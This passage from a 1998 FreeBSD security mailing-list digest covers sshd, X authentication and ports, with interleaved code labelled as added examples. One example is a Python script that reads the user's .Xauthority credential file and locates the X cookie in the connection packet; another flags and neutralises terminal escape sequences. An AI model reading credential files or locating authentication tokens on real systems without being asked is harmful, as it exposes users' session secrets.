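    + encode_entry(XauthEntry(FAMILY_INTERNET, bytes([192, 0, 2, 10]), b"0",
                              b"MIT-MAGIC-COOKIE-1", SAMPLE_COOKIE))
)

if __name__ == "__main__":
    path = os.environ.get("XAUTHORITY", os.path.expanduser("~/.Xauthority"))
    buf = open(path, "rb").read() if os.path.exists(path) else SAMPLE_XAUTHORITY
    for e in parse_xauthority(buf):
        print(e.family, e.address, e.number, e.name, e.data[:2].hex() + "...")
    if os.path.exists(path):
        print(xauthority_problems(path) or "file mode looks fine")
    req = x11_setup_request(b"MIT-MAGIC-COOKIE-1", SAMPLE_COOKIE)
    print("cookie at offset", req.find(SAMPLE_COOKIE), "of the setup request")
```

Run without arguments it reads your own .Xauthority if one exists (printing only the first two bytes of each cookie) and otherwise falls back to the constructed sample; the offset it prints for the cookie inside the setup request is what makes Peter's point concrete: the token is at a fixed, easily located position in the first packet of every connection to a TCP display.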
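The X-security thread grew out of the "cat exploit" discussion earlier in this digest (Garrett Wollman's control-E answerback, Mark Murray's terminals that can be told to send a string back, Karl Denninger's "display it, park the cursor on it, make the terminal transmit the line" trick as quoted by Cy Schubert). As an added illustration of that problem, not code from any message in the thread, here is a scanner that flags the bytes involved and a cat -v style filter that makes a file safe to write to a tty. The control codes and sequence grammar are the standard ECMA-48 ones; the sample bytes are constructed for the example and no claim is made that they exploit any particular terminal.

```python
"""Added example, not code from any message in this thread: find the
terminal-control bytes that can make a terminal act on, or talk back to,
text that is merely being displayed, and render them harmless.

The control codes and sequence grammar are the ECMA-48 ones; the sample
bytes at the bottom are constructed for the example."""
import re
import sys
from typing import List, Tuple

ENQ = 0x05   # control-E: the answerback trigger named in Garrett's message
ESC = 0x1b

# 7-bit and 8-bit forms of: CSI ... final byte; OSC/DCS/SOS/PM/APC ... ST/BEL;
# and two-byte ESC sequences.  String sequences run until ST (ESC \ or 0x9c)
# or BEL, so a stray title-setting OSC swallows whatever follows it.
_SEQ = re.compile(
    rb"\x1b\[[0-?]*[ -/]*[@-~]"
    rb"|\x1b[\]P^_X].*?(?:\x1b\\|\x07)"
    rb"|\x1b[ -/]*[0-~]"
    rb"|\x9b[0-?]*[ -/]*[@-~]"
    rb"|[\x90\x98\x9d\x9e\x9f].*?(?:\x9c|\x07)",
    re.DOTALL,
)
PASS_THROUGH_C0 = {0x09, 0x0a, 0x0d}   # tab, LF, CR are harmless


def _kind(seq: bytes) -> str:
    if seq[0] == ESC:
        return {b"\x1b[": "CSI", b"\x1b]": "OSC", b"\x1bP": "DCS"}.get(seq[:2], "ESC")
    return {0x9b: "CSI", 0x9d: "OSC", 0x90: "DCS"}.get(seq[0], "C1")


def find_hazards(data: bytes) -> List[Tuple[int, str, bytes]]:
    """(offset, kind, bytes) for every control sequence and every ENQ."""
    found = [(m.start(), _kind(m.group()), m.group()) for m in _SEQ.finditer(data)]
    found += [(i, "ENQ", b"\x05") for i, b in enumerate(data) if b == ENQ]
    return sorted(found)


def sanitize_for_terminal(data: bytes) -> bytes:
    """Show control bytes instead of executing them, as cat -v does:
    C0 controls become ^X, DEL becomes ^?, C1 controls become M-^X.
    Bytes 0xa0 and above pass through so UTF-8 text survives."""
    out = bytearray()
    for b in data:
        if b in PASS_THROUGH_C0 or 0x20 <= b < 0x7f or b >= 0xa0:
            out.append(b)
        elif b < 0x20:
            out += b"^" + bytes([b + 0x40])
        elif b == 0x7f:
            out += b"^?"
        else:                       # 0x80..0x9f
            out += b"M-^" + bytes([b - 0x80 + 0x40])
    return bytes(out)


# Constructed sample: plain text, a "concealed" attribute around some text,
# an ENQ, and an OSC that sets the window title.
SAMPLE = b"hello\n\x1b[8mhidden\x1b[0m\x05\x1b]0;title\x07world\n"

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    for off, kind, raw in find_hazards(data):
        print(f"offset {off}: {kind} {raw!r}")
    sys.stdout.buffer.write(sanitize_for_terminal(data))
```

Given a file name it lists every hazard with its offset and then writes the sanitized bytes; the sanitized output itself contains no ESC, C1 or ENQ bytes, so it can be displayed with cat. A pager that does the same translation (or cat -v) is the practical answer the thread keeps coming back to: never let raw file contents reach the terminal when running as root.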
Peter
-- 
Peter Jeremy (VK2PJ)                    peter.jeremy@alcatel.com.au
Alcatel Australia Limited
41 Mandible St                          Phone: +61 2 9690 5019
ALEXANDRIA  NSW  2015                   Fax:   +61 2 9690 5247

From owner-freebsd-security Sun Sep 13 22:23:49 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA29262 for freebsd-security-outgoing; Sun, 13 Sep 1998 22:23:49 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from peak.mountin.net ([207.227.119.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA29254 for ; Sun, 13 Sep 1998 22:23:44 -0700 (PDT) (envelope-from jeff-ml@mountin.net)
Received: (from daemon@localhost) by peak.mountin.net (8.9.1/8.9.1) id AAA00635; Mon, 14 Sep 1998 00:23:25 -0500 (CDT)
Received: from harkol-104.isdn.mke.execpc.com(169.207.64.232) by peak.mountin.net via smap (V1.3) id sma000633; Mon Sep 14 00:23:18 1998
Message-Id: <3.0.3.32.19980914002155.0078fb78@207.227.119.2>
X-Sender: jeff-ml@207.227.119.2
X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.3 (32)
Date: Mon, 14 Sep 1998 00:21:55 -0500
To: Roger Marquis , freebsd-security@FreeBSD.ORG
From: "Jeffrey J. Mountin"
Subject: Re: sshd
In-Reply-To:
References:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 07:59 PM 9/12/98 -0700, Roger Marquis wrote:
>If you're running inetd then it doesn't seem consistent to start
>daemons that don't need to run all the time from startup scripts.
>Inetd was designed to conserve memory. If you have it why not use it?
>/etc/inetd.conf is also a common place to implement access control (via
>tcp_wrappers).

The parent only takes up about 600K or so. As someone mentioned, keeping
ssh out of inetd gives you a backup access method, which would be telnet
w/SKEY.

>Other than that I've frequently run into situations where keepalives
>had to be turned off. In those cases ssh sessions invariably die and
>their daemons have to be killed-off by hand (kill ). As it is
>difficult to tell the original daemon from the child daemons it's also
>easy to accidentally kill the parent. If ssh is the only access you're
>locked-out. Easier and more consistent to use inetd where it's
>available, IMHO and YMMV.

Rarely have I seen hung sessions, even after being rudely disconnected
by the ISP(s) I connect into. Even then what's so difficult about
killing the child?

  # ps -ax -o uid,pid,ppid,state,tt,start,time,command | grep ssh
   UID   PID  PPID STAT  TT  STARTED      TIME COMMAND
     0   149     1 Is    ??  Fri06AM   0:05.52 /usr/local/sbin/sshd (sshd1)
     0 28319   149 S     ??  10:35PM   0:09.78 /usr/local/sbin/sshd (sshd1)

Only one session leader here and killing the parent would be bad form. 8-)

FWIW, you can -HUP the parent while on an active ssh session and not be
disconnected. If you use -HUP the worst that you could do is disconnect
someone.
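Steinar's "cat /var/run/sshd.pid" and Jeff's ps listing above are the two pieces of the same procedure: identify the listener, then kill only a hung child. The script below, an added example rather than code from either message, combines them: it reads the pid file at the path the thread names, parses a ps(1) listing into parent / children / orphans, walks the ppid chain to find the sshd serving the current session so it is never on the kill list, and emits the TERM plan. The sample listing is constructed for the example (the pids 149 and 28319 are borrowed from Jeff's output; the rest are made up), and the `ps -o pid,ppid,command` format is the one it expects.

```python
"""Added example (not code from the thread): tell the sshd listener apart
from its per-session children before sending signals.

Reads the pid file named in the thread (/var/run/sshd.pid), takes a ps(1)
listing, and classifies each sshd process.  The sample listing below is
constructed for the example."""
import os
import subprocess
from typing import Dict, List, NamedTuple, Optional, Tuple

PIDFILE = "/var/run/sshd.pid"   # path as given in the thread


class Proc(NamedTuple):
    pid: int
    ppid: int
    command: str


def parse_ps(text: str) -> List[Proc]:
    """Parse `ps -ax -o pid,ppid,command` output; the header line is skipped."""
    procs = []
    for line in text.splitlines()[1:]:
        parts = line.split(None, 2)
        if len(parts) == 3:
            procs.append(Proc(int(parts[0]), int(parts[1]), parts[2]))
    return procs


def read_pidfile(path: str = PIDFILE) -> Optional[int]:
    try:
        with open(path) as f:
            return int(f.read().strip())
    except (OSError, ValueError):
        return None


def _is_sshd(p: Proc) -> bool:
    # matches "/usr/local/sbin/sshd (sshd1)" as well as "sshd: user [priv]"
    return os.path.basename(p.command.split()[0]).startswith("sshd")


def classify_sshd(procs: List[Proc], pidfile_pid: Optional[int]) -> Dict[str, List[Proc]]:
    """parent  : the listener (pid from the pid file; else any sshd whose parent is init)
       children: sshd processes forked by the parent, one per session
       orphans : sshd processes with neither role, e.g. a child that outlived
                 a killed listener, or a second instance started by hand"""
    sshd = [p for p in procs if _is_sshd(p)]
    parents = [p for p in sshd if p.pid == pidfile_pid]
    if not parents:
        parents = [p for p in sshd if p.ppid == 1]
    parent_pids = {p.pid for p in parents}
    children = [p for p in sshd if p.ppid in parent_pids]
    orphans = [p for p in sshd if p not in parents and p not in children]
    return {"parent": parents, "children": children, "orphans": orphans}


def session_sshd(procs: List[Proc], my_pid: int) -> Optional[int]:
    """Walk up the ppid chain from my_pid to the sshd serving this session."""
    by_pid = {p.pid: p for p in procs}
    seen = set()
    p = by_pid.get(my_pid)
    while p and p.pid not in seen:
        if _is_sshd(p):
            return p.pid
        seen.add(p.pid)
        p = by_pid.get(p.ppid)
    return None


def kill_plan(classes: Dict[str, List[Proc]], keep: Optional[int]) -> List[Tuple[int, str]]:
    """TERM every child and orphan except `keep`.  The parent is never listed:
    HUP it separately if you want a reload without dropping sessions."""
    return [(p.pid, "TERM") for p in classes["children"] + classes["orphans"]
            if p.pid != keep]


# Constructed sample listing (not captured from a real host).
SAMPLE_PS = """\
  PID  PPID COMMAND
    1     0 /sbin/init --
  149     1 /usr/local/sbin/sshd (sshd1)
28319   149 /usr/local/sbin/sshd (sshd1)
28402   149 /usr/local/sbin/sshd (sshd1)
30111     1 /usr/local/sbin/sshd (sshd1)
28320 28319 -bash (bash)
"""

if __name__ == "__main__":
    try:
        live = subprocess.run(["ps", "-ax", "-o", "pid,ppid,command"],
                              capture_output=True, text=True, check=False).stdout
    except OSError:
        live = ""
    procs = parse_ps(live or SAMPLE_PS)
    classes = classify_sshd(procs, read_pidfile())
    keep = session_sshd(procs, os.getpid())
    for role, plist in classes.items():
        print(role, [p.pid for p in plist])
    print("would TERM:", kill_plan(classes, keep))
```

The script only prints the plan; feeding it to kill is deliberately left to the operator. On the sample listing, pid 149 is the parent named by the pid file, 28319 and 28402 are its session children, and 30111 (an sshd with ppid 1 that the pid file does not name) is reported as an orphan rather than mistaken for the listener.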
Jeff Mountin - Unix Systems TCP/IP networking
jeff@mountin.net

From owner-freebsd-security Sun Sep 13 23:24:00 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA10745 for freebsd-security-outgoing; Sun, 13 Sep 1998 23:24:00 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from super-g.inch.com (super-g.com [207.240.140.161]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA10740 for ; Sun, 13 Sep 1998 23:23:56 -0700 (PDT) (envelope-from spork@super-g.com)
Received: from localhost (localhost [127.0.0.1]) by super-g.inch.com (8.8.8/8.8.5) with SMTP id CAA06681; Mon, 14 Sep 1998 02:22:58 -0400 (EDT)
Date: Mon, 14 Sep 1998 02:22:58 -0400 (EDT)
From: spork X-Sender: spork@super-g.inch.com To: "Jeffrey J. Mountin" cc: Roger Marquis , freebsd-security@FreeBSD.ORG Subject: Re: sshd In-Reply-To: <3.0.3.32.19980914002155.0078fb78@207.227.119.2> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Data Point: A dozen machines, all running sshd as a daemon. Been doing it for more than two years.

Number of times sshd died: 0
Number of times inetd died: 4-ish (junk pointer, too low to make sense)
Number of years since machines that don't need inetd services have been running with no inetd, and hence no backup telnetd: 1
Number of times bitten: 0

If you really need a backup access method, get a console server :)

Charles

--- Charles Sprickman spork@super-g.com --- "...there's no idea that's so good you can't ruin it with a few well-placed idiots."

On Mon, 14 Sep 1998, Jeffrey J. Mountin wrote:
> At 07:59 PM 9/12/98 -0700, Roger Marquis wrote:
> >If you're running inetd then it doesn't seem consistent to start
> >daemons that don't need to run all the time from startup scripts.
> >Inetd was designed to conserve memory. If you have it why not use it?
> >/etc/inetd.conf is also a common place to implement access control (via
> >tcp_wrappers).
>
> The parent only takes up about 600K or so. As someone mentioned, keeping ssh out of inetd gives you a backup access method, which would be telnet w/SKEY.
>
> >Other than that I've frequently run into situations where keepalives
> >had to be turned off. In those cases ssh sessions invariably die and
> >their daemons have to be killed-off by hand (kill ). As it is
> >difficult to tell the original daemon from the child daemons it's also
> >easy to accidentally kill the parent. If ssh is the only access you're
> >locked-out. Easier and more consistent to use inetd where it's
> >available, IMHO and YMMV.
>
> Rarely have I seen hung sessions, even after being rudely disconnected by the ISP(s) I connect into. Even then what's so difficult about killing the child?
>
> # ps -ax -o uid,pid,ppid,state,tt,start,time,command | grep ssh
> UID PID PPID STAT TT STARTED TIME COMMAND
> 0 149 1 Is ?? Fri06AM 0:05.52 /usr/local/sbin/sshd (sshd1)
> 0 28319 149 S ?? 10:35PM 0:09.78 /usr/local/sbin/sshd (sshd1)
>
> Only one session leader here and killing the parent would be bad form. 8-)
>
> FWIW, you can -HUP the parent while on an active ssh session and not be disconnected. If you use -HUP the worst that you could do is disconnect someone.
>
>
> Jeff Mountin - Unix Systems TCP/IP networking
> jeff@mountin.net
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun Sep 13 23:29:06 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA11289 for freebsd-security-outgoing; Sun, 13 Sep 1998 23:29:06 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gratis.grondar.za (gratis.grondar.za [196.7.18.65]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA11255 for ; Sun, 13 Sep 1998 23:28:47 -0700 (PDT) (envelope-from mark@grondar.za) Received: from grondar.za (localhost [127.0.0.1]) by gratis.grondar.za (8.9.1/8.9.1) with ESMTP id IAA19308; Mon, 14 Sep 1998 08:28:14 +0200 (SAST) (envelope-from mark@grondar.za) Message-Id: <199809140628.IAA19308@gratis.grondar.za> To: Peter Jeremy cc: freebsd-security@FreeBSD.ORG Subject: Re: X-security In-Reply-To: Your message of " Mon, 14 Sep 1998 14:49:35 +1000." <98Sep14.144916est.40329@border.alcanet.com.au> References: <98Sep14.144916est.40329@border.alcanet.com.au> Date: Mon, 14 Sep 1998 08:28:13 +0200
From: Mark Murray Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Peter Jeremy wrote: > If you're worried about someone stealing your authentication token, > you'll need to use something like XDM-AUTHORIZATION-1 (*), SUN-DES-1 (**) > or ssh. : : > (**) I don't believe this is supported by anyone except Sun. Build the FreeBSD port of XFree86 on a 3.0-CURRENT box. You can ask for SUN-DES-1. M -- Mark Murray Join the anti-SPAM movement: http://www.cauce.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 13 23:40:39 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA13835 for freebsd-security-outgoing; Sun, 13 Sep 1998 23:40:39 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from whistle.com (s205m131.whistle.com [207.76.205.131]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA13825 for ; Sun, 13 Sep 1998 23:40:34 -0700 (PDT) (envelope-from archie@whistle.com) Received: (from smap@localhost) by whistle.com (8.7.5/8.6.12) id XAA17637; Sun, 13 Sep 1998 23:40:19 -0700 (PDT) Received: from bubba.whistle.com(207.76.205.7) by whistle.com via smap (V1.3) id sma017635; Sun Sep 13 23:40:10 1998 Received: (from archie@localhost) by bubba.whistle.com (8.8.7/8.6.12) id XAA16448; Sun, 13 Sep 1998 23:40:09 -0700 (PDT) 
From: Archie Cobbs Message-Id: <199809140640.XAA16448@bubba.whistle.com> Subject: Re: A question probably relevant to IPFW In-Reply-To: <19980913104429.16468.qmail@hotmail.com> from "N. N.M" at "Sep 13, 98 03:44:28 am" To: madrapour@hotmail.com (N. N.M) Date: Sun, 13 Sep 1998 23:40:09 -0700 (PDT) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL38 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

N. N.M writes:
> I was wondering if somebody could help me. I had a FreeBSD with IPFW
> active on it to filter some kinds of packets. It was rebooted
> automatically and frequently every 2 or 3 days at 2 am. I've removed
> IPFW from it and also set up another FreeBSD (with the same
> configuration) as the active filter. Now the new computer does the same:
> it's rebooted automatically and frequently every 2-3 days at 2 am. But the
> former computer hasn't been rebooted after removing IPFW from it and
> since the time it wasn't the active filter.

There is an old bug in ipfw that was fixed about a year ago. If you're running an old (eg, pre-2.2.6) version of FreeBSD try upgrading. Otherwise, never mind :-)

-Archie ___________________________________________________________________________ Archie Cobbs * Whistle Communications, Inc.
* http://www.whistle.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 13 23:57:40 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA16760 for freebsd-security-outgoing; Sun, 13 Sep 1998 23:57:40 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from aniwa.sky (pppk-28.igrin.co.nz [202.49.245.107]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA16753 for ; Sun, 13 Sep 1998 23:57:28 -0700 (PDT) (envelope-from andrew@squiz.co.nz) Received: from localhost (andrew@localhost) by aniwa.sky (8.8.7/8.8.7) with SMTP id SAA04317; Mon, 14 Sep 1998 18:51:01 +1200 (NZST) (envelope-from andrew@squiz.co.nz) Date: Mon, 14 Sep 1998 18:51:01 +1200 (NZST) 
From: Andrew McNaughton X-Sender: andrew@aniwa.sky Reply-To: andrew@squiz.co.nz To: "Jeffrey J. Mountin" cc: Roger Marquis , freebsd-security@FreeBSD.ORG Subject: Re: sshd In-Reply-To: <3.0.3.32.19980914002155.0078fb78@207.227.119.2> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Mon, 14 Sep 1998, Jeffrey J. Mountin wrote:
> >Other than that I've frequently run into situations where keepalives
> >had to be turned off. In those cases ssh sessions invariably die and
> >their daemons have to be killed-off by hand (kill ). As it is
> >difficult to tell the original daemon from the child daemons it's also
> >easy to accidentally kill the parent. If ssh is the only access you're
> >locked-out. Easier and more consistent to use inetd where it's
> >available, IMHO and YMMV.
>
> Rarely have I seen hung sessions, even after being rudely disconnected
> by the ISP(s) I connect into. Even then what's so difficult about
> killing the child?

I've had problems after having my modem drop and redial. Mostly sessions seem to survive this (with a fixed IP), but occasionally they haven't, and I've been unable to create new connections to sshd until I've killed the daemon process of the crashed session. This has happened to me three times, and in all cases I've had multiple sessions open and I've still had a live connection which I've been able to use to retrieve the situation. I can't say whether sshd recovers itself eventually, but it's not quick.
Andrew McNaughton To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 14 00:06:43 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA17802 for freebsd-security-outgoing; Mon, 14 Sep 1998 00:06:43 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from whistle.com (s205m131.whistle.com [207.76.205.131]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA17793; Mon, 14 Sep 1998 00:06:39 -0700 (PDT) (envelope-from archie@whistle.com) Received: (from smap@localhost) by whistle.com (8.7.5/8.6.12) id AAA17980; Mon, 14 Sep 1998 00:06:23 -0700 (PDT) Received: from bubba.whistle.com(207.76.205.7) by whistle.com via smap (V1.3) id sma017978; Mon Sep 14 00:06:05 1998 Received: (from archie@localhost) by bubba.whistle.com (8.8.7/8.6.12) id AAA16521; Mon, 14 Sep 1998 00:06:05 -0700 (PDT) 
From: Archie Cobbs Message-Id: <199809140706.AAA16521@bubba.whistle.com> Subject: Re: sshd In-Reply-To: from John Fieber at "Sep 12, 98 11:35:54 pm" To: jfieber@indiana.edu (John Fieber) Date: Mon, 14 Sep 1998 00:06:05 -0700 (PDT) Cc: marquis@roble.com, freebsd-security@FreeBSD.ORG, ports@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL38 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

John Fieber writes:
> > For one thing 'make -n install' typically doesn't yield readable
> > information unless you first 'cd work/*'.
>
> 'more pkg/PLIST' is generally more efficient......if the PLIST is
> accurate.
>
> > Secondly, while port A installs under /usr/, port B
> > installs to /usr/local/etc and port C in /usr/libexec, ...
> > You can never be sure what is going where and it's a rare
> > port that can be uninstalled with 'make uninstall'.
> > ...
>
> A more frustrating problem for me are ports that are not
> ${PREFIX} != /usr/local compatible which makes it a hassle to
> install multiple versions of a port or separate ports that have
> common files. Also, I occasionally go through phases of liking
> the SysV way of installing things in /opt/,
> /etc/opt/ and /var/opt/ which a simple 'make
> PREFIX=/opt/' doesn't really accomplish.
If someone was interested, it would be easy to write a script that checks all the ports:

- mount / and /usr read-only
- mount /usr/local and /usr/local2 read-write, initially empty except for the directory structure
- save mtree dumps of every file in /usr/local and /usr/local2
- cycle through every port and:
  - build the port with PREFIX=/usr/local
  - install the port, then uninstall the port
  - compare the contents of /usr/local with the mtree file
  - build the port with PREFIX=/usr/local2
  - install the port, then uninstall the port
  - compare the contents of /usr/local2 AND /usr/local with the mtree files

If any port exhibited bad behavior, it could also automatically generate a send-pr report :-)

-Archie ___________________________________________________________________________ Archie Cobbs * Whistle Communications, Inc. * http://www.whistle.com

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Sep 14 00:42:13 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA23049 for freebsd-security-outgoing; Mon, 14 Sep 1998 00:42:13 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from redfish.go2net.com (redfish.go2net.com [207.178.55.5]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id AAA22992 for ; Mon, 14 Sep 1998 00:42:08 -0700 (PDT) (envelope-from marcs@go2net.com) Received: from marcs by redfish.go2net.com with smtp (Exim 1.82 #2) id 0zITF7-0003f3-00; Mon, 14 Sep 1998 00:40:13 -0700 Date: Mon, 14 Sep 1998 00:40:13 -0700 (PDT)
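An added example sketching the snapshot / install / deinstall / compare loop above; it is not the script Archie proposes and nothing in it comes from the ports framework. It substitutes find and cksum for mtree so it runs on any system, and install_hook/deinstall_hook are constructed stand-ins for a port's make targets: three fake ports show a clean one, one that leaves a config file behind, and one that ignores PREFIX (the case the second prefix is there to catch).

```shell
#!/bin/sh
# Added example, not the script Archie describes: a portable sketch of the
# snapshot / install / deinstall / compare loop. mtree(8) is FreeBSD-specific,
# so this assumes find(1) and cksum(1) instead; install_hook and deinstall_hook
# are placeholder hooks standing in for "make install" / "make deinstall".

# snapshot_tree DIR: one "crc size ./path" line per regular file, sorted,
# so two snapshots of the same tree compare byte-for-byte.
snapshot_tree() {
    ( cd "$1" && find . -type f | sort | while IFS= read -r f; do
        cksum "$f"
    done )
}

# tree_diff BEFORE AFTER: print leftover or altered entries; return 1 if any.
tree_diff() {
    cmp -s "$1" "$2" && return 0
    diff "$1" "$2" | grep '^[<>]' || true
    return 1
}

# check_port_cleanup NAME PREFIX [OTHER_DIR ...]
# Snapshot PREFIX and every OTHER_DIR, install then deinstall NAME into PREFIX,
# and flag any directory whose contents changed. Listing the "other" prefix
# (e.g. /usr/local while installing into /usr/local2) catches ports that
# ignore PREFIX and write to a hard-coded location.
check_port_cleanup() {
    name=$1; shift
    prefix=$1
    work=$(mktemp -d)
    i=0
    for d in "$@"; do
        i=$((i + 1))
        snapshot_tree "$d" > "$work/before.$i"
    done
    install_hook "$prefix" "$name"
    deinstall_hook "$prefix" "$name"
    rc=0
    i=0
    for d in "$@"; do
        i=$((i + 1))
        snapshot_tree "$d" > "$work/after.$i"
        if ! tree_diff "$work/before.$i" "$work/after.$i"; then
            echo "$name: $d differs after install+deinstall" >&2
            rc=1
        fi
    done
    rm -rf "$work"
    return $rc
}

# Placeholder hooks (constructed for the demo; a real run would invoke the
# port's make targets). "tidy" cleans up; "sloppy" forgets its config file;
# "hardcoded" installs into $FIXED_PREFIX regardless of PREFIX but deinstalls
# from PREFIX, so its binary is left behind in the wrong tree.
install_hook() {
    case $2 in
        tidy)      echo bin > "$1/bin/$2" ;;
        sloppy)    echo bin > "$1/bin/$2"; echo cfg > "$1/etc/$2.conf" ;;
        hardcoded) echo bin > "$FIXED_PREFIX/bin/$2" ;;
    esac
}
deinstall_hook() {
    case $2 in
        tidy|sloppy|hardcoded) rm -f "$1/bin/$2" ;;
    esac
}

# run_demo: build two empty prefixes and check the three fake ports,
# installing into local2 while watching local as well.
run_demo() {
    top=$(mktemp -d)
    mkdir -p "$top/local/bin" "$top/local/etc" "$top/local2/bin" "$top/local2/etc"
    FIXED_PREFIX=$top/local
    for p in tidy sloppy hardcoded; do
        if check_port_cleanup "$p" "$top/local2" "$top/local" 2>/dev/null >/dev/null; then
            echo "$p: clean"
        else
            echo "$p: leaves files behind"
        fi
    done
    rm -rf "$top"
}

run_demo
```

Hooking this to real ports would mean replacing the two hooks with cd-and-make calls and snapshotting the real prefixes; the comparison and reporting logic stays the same.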
From: Marc Slemko X-Sender: marcs@redfish To: Andrew McNaughton cc: freebsd-security@FreeBSD.ORG Subject: Re: sshd In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Mon, 14 Sep 1998, Andrew McNaughton wrote:
> > Rarely have I seen hung sessions, even after being rudely disconnected
> > by the ISP(s) I connect into. Even then what's so difficult about
> > killing the child?
>
> I've had problems after having my modem drop and redial. Mostly sessions
> seem to survive this (with a fixed IP), but occasionally they haven't, and
> I've been unable to create new connections to sshd until I've killed the
> daemon process of the crashed session. This has happened to me three
> times, and in all cases I've had multiple sessions open and I've still had
> a live connection which I've been able to use to retrieve the situation.
> I can't say whether sshd recovers itself eventually, but it's not quick.

That is a different issue and will happen if it is running from inetd or standalone. What is probably happening there is that your machine thinks the connection is dead, but the server doesn't know it thinks that since the connection was down when it began to think that. By chance (not random chance, of course) if your client decides to use the same client port, then its connection attempt will look like bogus data from the existing connection to the server. Until the server tries to send something (eg. keepalive) to the client and gets a RST, this will keep happening. The way around it is to just try sshing in twice at the same time; obviously, then one has to use a different port. If you had multiple sessions open, then you may need to do n+1 sessions to get in from the client.
Randomized allocation of ports on the client side (a libc thing) would avoid this, and would certainly avoid the case where it keeps happening over and over due to deterministic port allocation by the client. There is a thread about this (not related specifically to ssh, IIRC) from some list (tcp-impl or end2end-interest I think...) that I should reference here, but my brain doesn't want me to go look it up. It is possible this was already changed in -current, don't know. Of course, this may not be your problem but it does sound like it. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 14 00:52:09 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA24951 for freebsd-security-outgoing; Mon, 14 Sep 1998 00:52:09 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA24835; Mon, 14 Sep 1998 00:52:03 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.1/8.8.5) with ESMTP id JAA22466; Mon, 14 Sep 1998 09:45:21 +0200 (CEST) To: Archie Cobbs cc: jfieber@indiana.edu (John Fieber), marquis@roble.com, freebsd-security@FreeBSD.ORG, ports@FreeBSD.ORG Subject: Re: sshd In-reply-to: Your message of "Mon, 14 Sep 1998 00:06:05 PDT." <199809140706.AAA16521@bubba.whistle.com> Date: Mon, 14 Sep 1998 09:45:21 +0200 Message-ID: <22464.905759121@critter.freebsd.dk> 
